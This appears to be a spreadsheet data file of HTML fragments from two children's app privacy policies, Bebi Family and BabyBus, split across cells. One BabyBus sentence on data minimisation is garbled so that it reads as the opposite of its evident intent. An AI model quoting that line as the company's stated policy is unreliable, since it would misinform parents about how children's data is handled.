&lt;p&gt;Your continued use of the Apps and Services following the posting of changes will mean you accept those changes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Contact us&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any questions regarding privacy while using the Apps, or have questions about our practices, please contact us via email at &lt;a href="/cdn-cgi/l/email-protection#7f161119103f1d1a1d1651191e12161306"&gt;&lt;span class="__cf_email__" data-cfemail="254c4b434a654740474c0b4344484c495c"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;/section&gt;_x005F_x000D_
_x005F_x000D_
    &lt;/main&gt;_x005F_x000D_
_x005F_x000D_
    &lt;footer class="footer mt-auto py-3"&gt;_x005F_x000D_
        &lt;div class="footer-content container"&gt;_x005F_x000D_
            &lt;div class="legal-links"&gt;_x005F_x000D_
                &lt;a href="/en/about/privacy-policy"&gt;Privacy Policy&lt;/a&gt;_x005F_x000D_
                &lt;a href="/en/about/terms-of-use"&gt;Terms of Use&lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="social-links"&gt;_x005F_x000D_
                &lt;a href="https://twitter.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/twitter.svg" alt="Bebi Family on Twitter" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.instagram.com/bebi.family" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/instagram.svg" alt="Bebi Family on Instagram" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.facebook.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/facebook.svg" alt="Bebi Family on Facebook" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="copyright"&gt;_x005F_x000D_
                &amp;copy; 2019 - 2023 Bebi Family_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/footer&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="/js/main.js?v=UTxhL3MyHpgL0N2td9gbE7FqpUe8S5sPMTWC6hSEXcE"&gt;&lt;/script&gt;_x005F_x000D_
    _x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>If you are unsure about whether our Services are compliant with your own country of residences&amp;rsquo; specific data protection and user privacy legislation you&amp;nbsp;should contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="553c3b333a153730373c7b3334383c392c7b"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;What information we collect&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our primary purpose in collecting information is to provide you with a safe, efficient and customized experience and to provide you with Services and features that better meet your needs or requests.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We may collect personal and non-personal information from our users. The personal information is the one as defined above under the section &amp;ldquo;what is personal information&amp;rdquo;.</t>
  </si>
  <si>
    <t>We make sure we do not store your information for a longer period than necessary.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Legal basis of processing&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When we collect, use, store or process, in any other way, your information, we rely on a number of legal bases, as set forth in this Privacy Policy:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Consent: we rely on your consent to store and use your personal information you provided to us. You may withdraw your consent at any time by contacting us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="96fff8f0f9d6f4f3f4ffb8f0f7fbfffaefb8"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; If you do not consent to the use of your personal data we may not be able to provide you with all or parts of our services.</t>
  </si>
  <si>
    <t>Before providing any information to any third-party website or service, we encourage you to review the privacy policy and other terms and conditions of that website or service. You agree that we will have no liability for any matters relating to a third-party website or service that you provide information to, including their collection and handling of that information.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;Data retention periods&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We will not keep your personal or non-personal data for any longer than is necessary in light of the reason(s) for which it was first collected.&amp;nbsp;You can always request that we suspend or remove your personal data by writing to &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b8d1d6ded7f8dadddad196ded9d5d1d4c196"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>The right to restrict (i.e. prevent) the processing of your personal data.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;e)&amp;nbsp;&amp;nbsp;The right to object to us for using your personal data for a particular purpose or purposes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;f)&amp;nbsp; &amp;nbsp;The right to withdraw consent.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;g)&amp;nbsp;&amp;nbsp;The right to&amp;nbsp;data portability.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;h)&amp;nbsp;&amp;nbsp;Rights relating to automated decision-making and profiling. We do not use your personal data in this way.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; For any right of yours in relation to your personal information, you can always contact us by writing to&amp;nbsp;&lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="61080f070e21030403084f07000c080d18"&gt;[email&amp;#160;protected]&lt;/a&gt;&amp;nbsp;to ask for more detailed information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any cause for complaint about our use of your personal data, you have the right to lodge a complaint with appropriate authorities.</t>
  </si>
  <si>
    <t>That said, we would welcome the opportunity to resolve your concerns ourselves, so please contact us first at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="71181f171e31131413185f17101c181d085f"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Security Measures&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We use industry-standard security measures at Bebi Family Games in order to secure your personal data. We also work with third-party service providers who possess high levels of security measures and provide relevant physical and technical safeguards to keep your personal data secure.&amp;nbsp;We use Secure Sockets Layer (SSL) software to encrypt the information you enter on our Apps and the Website in order to protect its security during transmission to and from our Apps or the Website.</t>
  </si>
  <si>
    <t>We are also required to get a consent from a parent or a legal guardian of the child below the age of 16 (in some member states of the EU) before they may use our Apps, in order to be compliant with the GDPR. We do not collect any personal information from children who cannot provide a valid consent according to the laws that apply to us. If a parent or a legal guardian of an underage child thinks that their child is using our Apps without their consent then they can contact us by writing at &lt;a href="/cdn-cgi/l/email-protection#88e1e6eee7c8eaedeae1a6eee9e5e1e4f1"&gt;&lt;span class="__cf_email__" data-cfemail="51383f373e11333433387f37303c383d28"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">We will immediately take actions, including removal of personal information relating to an underage child, subject to proof of identification to prevent any wrongful removal of information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Parents of legal guardians of children have certain rights that they may exercise by directly getting in touch with us via our email address &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d8b1b6beb798babdbab1f6beb9b5b1b4a1f6"&gt;[email&amp;#160;protected]&lt;/a&gt; These rights include:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Right to know what information we collect about children and how we process this data;&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Right to request removal or rectification of information relating to a child;&lt;/li&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>&lt;li&gt;Right to withdraw consent of the collection of personal data of a child.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Changes to our Privacy Policy&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;p&gt; This Privacy Policy may be updated from time to time for any reason.</t>
  </si>
  <si>
    <t xml:space="preserve">We will notify you of any changes to our Privacy Policy by posting the new Privacy Policy at:&lt;a href="https://www.google.com/url?q=https://bebi.family/privacy-policy/&amp;amp;sa=D&amp;amp;source=editors&amp;amp;ust=1630843964159000&amp;amp;usg=AOvVaw2I4fDXHTyuh2Z2WwpEXU2y"&gt;&amp;nbsp;&lt;/a&gt;https://privacy.bebi.family/&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Your continued use of the Apps and Services following the posting of changes will mean you accept those changes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Contact us&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any questions regarding privacy while using the Apps, or have questions about our practices, please contact us via email at &lt;a href="/cdn-cgi/l/email-protection#3d54535b527d5f585f54135b5c50545144"&gt;&lt;span class="__cf_email__" data-cfemail="b6dfd8d0d9f6d4d3d4df98d0d7dbdfdacf"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;/section&gt;_x005F_x000D_
_x005F_x000D_
    &lt;/main&gt;_x005F_x000D_
_x005F_x000D_
    &lt;footer class="footer mt-auto py-3"&gt;_x005F_x000D_
        &lt;div class="footer-content container"&gt;_x005F_x000D_
            &lt;div class="legal-links"&gt;_x005F_x000D_
                &lt;a href="/en/about/privacy-policy"&gt;Privacy Policy&lt;/a&gt;_x005F_x000D_
                &lt;a href="/en/about/terms-of-use"&gt;Terms of Use&lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="social-links"&gt;_x005F_x000D_
                &lt;a href="https://twitter.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/twitter.svg" alt="Bebi Family on Twitter" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.instagram.com/bebi.family" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/instagram.svg" alt="Bebi Family on Instagram" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.facebook.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/facebook.svg" alt="Bebi Family on Facebook" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="copyright"&gt;_x005F_x000D_
                &amp;copy; 2019 - 2023 Bebi Family_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/footer&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="/js/main.js?v=UTxhL3MyHpgL0N2td9gbE7FqpUe8S5sPMTWC6hSEXcE"&gt;&lt;/script&gt;_x005F_x000D_
    _x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>﻿&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
	&lt;head&gt;
		&lt;meta charset="utf-8"&gt;
		&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"&gt;
		&lt;meta name="description" content="BabyBus focuses on meeting the educational needs of preschool children. Our apps are divided into two age groups, the Starter Series for toddlers and the Prodigy Series for children 3 year and older. It is our goal to make learning a fun task for children.</t>
  </si>
  <si>
    <t>We are children's best companion to knowledge and growth. "&gt;
		&lt;meta name="keywords" content="BabyBus,preschool,early education,childhood,cognition,toddlers,alphabet,children apps,panda,UPK,kindergarten,kids,Baby Learns Shapes"&gt;
		&lt;meta name="author" content="BabyBus (Fujian) Network Technology Ltd."&gt;
		&lt;link href="/Public/css/bootstrap.min.css" rel="stylesheet"&gt;
		&lt;link rel="apple-touch-icon-precomposed" href="https://en.babybus.com/favicon.png"&gt;
		&lt;!--[if lt IE 9]&gt;&lt;script src="/Public/js/respons/ie8-responsive-file-warning.js"&gt;&lt;/script&gt;&lt;![endif]--&gt;
		&lt;!--</t>
  </si>
  <si>
    <t>HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --&gt;
		&lt;!--[if lt IE 9]&gt;
      &lt;script src="/Public/js/respons/html5shiv.js"&gt;&lt;/script&gt;
      &lt;script src="/Public/js/respons/respond.min.js"&gt;&lt;/script&gt;
    &lt;! [endif]--&gt;
		&lt;link href="/Public/css/public.css" rel="stylesheet"&gt;
		&lt;title&gt;PRIVACY POLICY - BabyBus - Your children's best learning companion!&lt;/title&gt;
	&lt;/head&gt;
	&lt;body&gt;
		&lt;!--=============navbar导航===================
==============================================--&gt;
&lt;div class="navbar navbar-inverse navbar-fixed-top" role="navigation"&gt;
    &lt;div class="container"&gt;
        &lt;div class="navbar-header"&gt;
            &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".navbar-collapse"
                id="navbar_toggle"&gt;
                &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;/button&gt;
            &lt;div class="logo" id="header-logo-1"&gt;&lt;a id="logo_url" href="https://en.babybus.com"&gt;&lt;img
                        src="/Public/images/Public/logo.png"
                        alt="BabyBus focuses on meeting the educational needs of preschool children.</t>
  </si>
  <si>
    <t>We are fully mobile so children can take their favorite BabyBus characters with them anywhere they go. It's time to have the most fun learning." /&gt;&lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="logo" id="header-logo-2" style="display: none;"&gt;&lt;img src="/Public/images/Public/logo.png"
                    alt="BabyBus focuses on meeting the educational needs of preschool children.</t>
  </si>
  <si>
    <t>We are fully mobile so children can take their favorite BabyBus characters with them anywhere they go. It's time to have the most fun learning." /&gt;
            &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="navbar-collapse collapse navbar-right navbar-margintop"&gt;
            &lt;ul class="nav navbar-nav"&gt;
                &lt;li data-value="Index"&gt;&lt;a href="/index.php?s=/index/index.shtml"&gt;Home&lt;/a&gt;&lt;/li&gt;
                &lt;li data-value="Product"&gt;&lt;a href="/index.php?s=/product/index.shtml"&gt;Our Apps&lt;/a&gt;&lt;/li&gt;
                &lt;li class="dropdown</t>
  </si>
  <si>
    <t>mul-dropdown" data-value="About"&gt;&lt;a href="#" class="dropdown-toggle"
                        data-toggle="dropdown"&gt;About Us&lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
                    &lt;ul class="dropdown-menu" role="menu"&gt;
                        &lt;li&gt;&lt;a href="/index.php?s=/about/email.shtml"&gt;Postcard&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/index.php?s=/about/babybus.shtml"&gt;Babybus Ads&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/index.php?s=/about/theme.shtml"&gt;Design&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/index.php?s=/about/contact.shtml"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/index.php?s=/about/index.shtml"&gt;About Us&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                 &lt;/li&gt;
                &lt;li class="dropdown mul-dropdown"&gt;&lt;a href="#" class="dropdown-toggle"
                        data-toggle="dropdown"&gt;English&lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
                    &lt;ul class="dropdown-menu" role="menu"&gt;
                        &lt;li&gt;&lt;a href="http://cn.babybus.com"&gt;简体中文&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://tw.babybus.com"&gt;繁體中文&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://ko.babybus.com"&gt;한국어&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://ja.babybus.com"&gt;日本語&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://fr.babybus.com"&gt;Français&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://de.babybus.com"&gt;Deutsch&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="http://ru.babybus.com"&gt;Русский&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="http://pt.babybus.com"&gt;Português&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/li&gt;
            &lt;/ul&gt;
         &lt;/div&gt;
        &lt;!--/.nav-collapse --&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;script src="/Public/js/jquery.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
    $(function () {
        var userAgent_arr = navigator.userAgent.split("/");
        var client_kernell = userAgent_arr[userAgent_arr.length - 1];
        if ((client_kernell &amp;&amp; client_kernell.indexOf("Kernel") &gt; -1))</t>
  </si>
  <si>
    <t xml:space="preserve">{
            $("#navbar_toggle").css("display", "none");
            $("#header-logo-1").css("display", "none");
            $("#header-logo-2").css("display", "block");
        }
        if ((window.location.href.indexOf("declaration") &gt; -1) || (window.location.href.indexOf("privacyPolicy") &gt; -1)) {
            $("#navbar_toggle").css("display", "none");
            $(".navbar-nav").css("display", "none");
            $("#logo_url").attr("href", "#");
        }
        web_url = 'https://en.babybus.com';
        var model = 'Index';
        $(".navbar-nav li").each(function () {
            var val = $(this).attr("data-value");
            if (val != "undefined") {
                if (model == val) {
                    $(this).addClass("active");
                    </t>
  </si>
  <si>
    <t>$(this).siblings().removeClass("active");
                }
            }
        })
    })
&lt;/script&gt;
		&lt;!--=============section主体内容区域===================
==============================================--&gt;
		&lt;div class="container download margin-top90"&gt;
			&lt;div class="row joinus"&gt;
				&lt;div class="col-md-3 hidden-xs hidden-sm policy-left-box"&gt;
					&lt;div class="ist-group margin-top30"style="width: 213px;" data-spy="affix" data-offset-top="60" data-offset-bottom="200"&gt;
					  &lt;a href="/index.php?s=/index/declaration.shtml" class="list-group-item"&gt;User Agreement&lt;/a&gt;
					  &lt;a href="/index.php?s=/index/privacyPolicy.shtml" class="list-group-item active"&gt;Privacy Policy&lt;/a&gt;
                        &lt;a href="/index.php?s=/index/link.shtml" class="list-group-item"&gt;Partenariat web&lt;/a&gt;					&lt;/div&gt;
				&lt;/div&gt;
				&lt;div class="col-md-9 margin-top10 statements policy-right-box"&gt;
					&lt;h3 style="color: #00BAE9;"&gt;Privacy Policy&lt;/h3&gt;
					&lt;p&gt;Last updated: August 16, 2022&lt;/p&gt;
					&lt;p&gt;Effective date: August 17, 2022&lt;/p&gt;
					&lt;article&gt;
						&lt;p class="detail"&gt;BABYBUS CO., LTD., and its affiliated companies (collectively referred to as “BabyBus”, “we”, or “us”) respect the privacy of its users, both parents and children (hereinafter referred to as “you” or “user”). We believe that it is important for you to make informed decisions regarding the use of our applications(“Apps”). Therefore, we have provided our privacy policy (“Privacy Policy”)which describes our privacy practices while you use our Apps.</t>
  </si>
  <si>
    <t>Please read it carefully as it will help you understand what we do with the information that we collect.&lt;/p&gt;
						&lt;p class="detail mark" style="color: #ff0000;"&gt;&lt;strong&gt;If you are a minor child or under the legal age to consent, please read the following this privacy policy with your parent. Also, you must obtain parental consent before playing our Apps. &lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;BabyBus is committed to protecting the privacy of children who use our Apps.</t>
  </si>
  <si>
    <t>This privacy policy explains our information collection, disclosure, and parental consent practices concerning the information provided by children. Accordingly, this Privacy Policy aims to comply with the requirement of the U.S. Children's Online Privacy Protection Act ("COPPA"), the General Data Information Protection Regulation and(“GDPR”) and any other applicable laws. We reserve the right to amend this Privacy Policy.&lt;/p&gt;
						&lt;p class="detail"&gt;We may translate this Policy into other languages.</t>
  </si>
  <si>
    <t>If there is any difference between the English version and any other language version of this Agreement, (subject to applicable laws and regulations) the English version will prevail to the extent of the inconsistency.&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;1. What information do we collect from you and how do we use it?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							 &lt;span&gt;</t>
  </si>
  <si>
    <t>In short, we collect information directly or passively and w. We won’t aim to minimize how much personal information we collect from users. require a child to disclose more information than is reasonably necessary.&lt;/span&gt;
							&lt;ul&gt;
								&lt;li&gt;
									&lt;span&gt;(a)</t>
  </si>
  <si>
    <t>Information we collect directly from you&lt;/span&gt;
									&lt;div class="table-box" style="width: 100%; overflow-x: scroll;"&gt;
										&lt;table border="1" cellpadding="7" style="margin-top: 10px;"&gt;
											&lt;thead&gt;
											&lt;tr align="center"&gt;
												&lt;th style="width: 33.33%;"&gt;Type of information&lt;/th&gt;
												&lt;th style="width: 33.33%;"&gt;Why we use it&lt;/th&gt;
												&lt;th style="width: 33.33%;"&gt;Legal basis&lt;/th&gt;
											&lt;/tr&gt;
											&lt;/thead&gt;
											&lt;tbody&gt;
											&lt;tr align="center"&gt;
												&lt;td&gt;Email Address&lt;/td&gt;
												&lt;td&gt;To create your account for the App as per your request&lt;/td&gt;
												&lt;td&gt;With your consent&lt;/td&gt;
											&lt;/tr&gt;
											&lt;/tbody&gt;
										&lt;/table&gt;
									&lt;/div&gt;
								&lt;/li&gt;
								&lt;li&gt;(b) Information we collect passively:
									&lt;p&gt;We also collect certain information automatically through your use of our Apps. This type of data does not identify you personally but may uniquely identify the device you are using. Under some legislation, these data might be considered as personal information:&lt;/p&gt;
									&lt;ul&gt;
										&lt;li&gt;(1) Internet Protocol (IP) address;&lt;/li&gt;
										&lt;li&gt;(2) Broad geographic location (e.g. country or city-level location) based on your IP address;&lt;/li&gt;
										&lt;li&gt;(3) Log and usage data, such as game progress, game time, achievements, and error and crash reports;&lt;/li&gt;
										&lt;li&gt;(4) Device information, including the device type, device model, device maker, device operating system and its language or other technical data.</t>
  </si>
  <si>
    <t>We use these information to:
											&lt;ul&gt;
												&lt;li&gt;(i) allow you to connect to the server;&lt;/li&gt;
												&lt;li&gt;(ii) operate, provide, maintain, protect, manage, customize our Apps and the way in which we offer them; &lt;/li&gt;
												&lt;li&gt;(iii) enhance the experience with our Apps, detect fraud, security or technical issues in connection with the Apps.&lt;/li&gt;
											&lt;/ul&gt;
										&lt;/li&gt;
									&lt;/ul&gt;
								&lt;/li&gt;
								&lt;li&gt;(c) Information collected by third parties:
									&lt;p&gt;Please read Part 2(Advertising) and Part 3(a)(Authorized third parties) of the Privacy Policy carefully . &lt;/p&gt;
								 &lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;2.</t>
  </si>
  <si>
    <t>How is my personal information used for advertising?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;ul&gt;
								&lt;li&gt;(a)Ad Partner Technologies
									&lt;p&gt;In order to allow us to continue offering out Apps free of charge or at low cost, we integrate Ad Partners' technologies into our Apps to display advertisements to you. &lt;/p&gt;
								 &lt;/li&gt;
								&lt;li&gt;(b) Do Ad Partners show Targeted Ads?</t>
  </si>
  <si>
    <t>How to Opt-Out of them?
									&lt;p&gt;Some Ad Partners may collect device identifiers (i.e. IDFA on iOS) that may be used to enable advertising tracking and thus display targeted ads. By reviewing the permissions in Ad Partners’ technologies, we have effectively disabled their collection function by default. However, such technologies methods can not be fully guaranteed.</t>
  </si>
  <si>
    <t>In order to prevent Targeted Ads, we encourage you to disable our Apps from collecting this device identifier when prompted for an authorization notification or through the privacy settings on your phone system.&lt;/p&gt;
								&lt;/li&gt;
							&lt;/ul&gt;
						 &lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;3. Do we share the information we collect?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt;</t>
  </si>
  <si>
    <t>We &lt;strong&gt;do not sell&lt;/strong&gt; any of your personal information to any independent third parties. Situations where we will &lt;strong&gt; disclose&lt;/strong&gt; or &lt;strong&gt;allow&lt;/strong&gt; a third party to collect your information are:&lt;/span&gt;
							&lt;ul&gt;
								&lt;li&gt;(a)</t>
  </si>
  <si>
    <t>Our affiliated companies
									&lt;p&gt;We may share information with companies within the Babybus group, which includes our subsidiaries (i.e., any organization that we own or control) that were registered globally (e.g.Babybus (Fujian) Network Technology Co., Ltd., Japan Babybus Co., Ltd., Singapore Babybus Pte. Ltd.). These companies will use your personal information in the same way as we do under this Policy.&lt;/p&gt;
									&lt;p&gt; We see this processing as necessary for the purposes of the legitimate interests pursued by us.</t>
  </si>
  <si>
    <t>However, your consent to such processing will be requested as appropriate under applicable law.&lt;/p&gt;
								&lt;/li&gt;
					      	    &lt;li&gt;(b) Business transfers
									&lt;p&gt;We may transfer our information bases containing personal information in the event of a merger, acquisition, reorganization, bankruptcy or other similar events. We will make an announcement in advance, disclose the details of the event and information about the successor, and with the express consent of you and/or your parent and/or guardian (if applicable) again.&lt;/p&gt;
								&lt;/li&gt;
								&lt;li&gt;(c) Law enforcement-related disclosure
									&lt;p&gt; We may be required to share information (including personal information) collected if the information is required by law to prevent, investigate, or take action regarding illegal activities, situations involving potential threats to physical safety, rights, property or of any person, suspected fraud and violations of our terms and agreements and in response to legal process, court orders, subpoenas, or to establish or exercise our legal rights.&lt;/p&gt;
								&lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;4.</t>
  </si>
  <si>
    <t>How do we protect and secure your information?&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;ul&gt;
								&lt;li&gt;We may take proper physical, technical and administrative measures based on the existing technologies to prevent the illegal copying, loss, misuse, unauthorized access, download, disclosure, and changes of your information security. These measures include, but are not limited to, SSL, encrypted storage, information center access control, and dedicated network channels and proxies.&lt;/li&gt;
								&lt;li&gt;Unfortunately, the transmission of information via the internet is not completely secure. While we strive to protect your personal information, we would also remind you to be aware of hacking, cyber-attacks, and other risks on the Internet.&lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;5.</t>
  </si>
  <si>
    <t>Parental rights&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;ul&gt;
								&lt;li&gt;At any time, parents can refuse to permit us to collect further personal information from their children and can request that we delete the personal information we have collected in connection with that account. Please keep in mind that a request to delete personal information may lead to the deletion of an account.&lt;/li&gt;
								&lt;li&gt;Parents can request access to and delete their children’s personal information by logging into the children's account. &lt;/li&gt;
								&lt;li&gt;Parents can also contact us to request access to, change, or delete their child's personal information by sending an email to us at privacy@babybus.com.&lt;/li&gt;
							&lt;/ul&gt;
						&lt;/p&gt;
						&lt;p class="detail section-header"&gt;&lt;strong&gt;6.</t>
  </si>
  <si>
    <t>Your rights&lt;/strong&gt;&lt;/p&gt;
						&lt;p class="detail"&gt;
							&lt;span&gt;Data protection law is jurisdiction-specific and we seek to abide by all relevant applicable laws. &lt;/span&gt;
							&lt;ul&gt;
								&lt;li&gt;(1) For EEA (European Economic Area) Residents, please read Part 6.2 (Your rights as an EEA resident) , Part 6.5 (EU&amp;UK representative) and</t>
  </si>
  <si>
    <t>Part 7 (International Transfer) of the Privacy Policy carefully.&lt;/li&gt;
								&lt;li&gt;(2) For California Resident, please read Part 6.3 (Your rights as a California Resident) of the Privacy Policy carefully.&lt;/li&gt;
								&lt;li&gt;(3) For other residents, please read Part 6.1 (General rights), and other parts if applicable carefully.&lt;/li&gt;
								&lt;li&gt;&lt;strong&gt;6.1. General rights&lt;/strong&gt;
									&lt;ul&gt;
										&lt;li&gt;Your rights is determined by the country in which you reside. Many counties have specific laws relating to privacy.</t>
  </si>
  <si>
    <t>We seeks to abide by all relevant national laws.&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(1) Right to Know&lt;/span&gt;
											&lt;p&gt;If you request in writing via email, we will provide you a copy of your personal information in an electronic format after passing our verification process.&lt;/p&gt;
										&lt;/li&gt;
										&lt;li&gt;
											&lt;span&gt;(2) Right to Rectify&lt;/span&gt;
											&lt;p&gt;If we process your personal information, we shall endeavor to ensure by implementing suitable measures that your personal information is accurate and up-to-date for the purposes for which it was collected.</t>
  </si>
  <si>
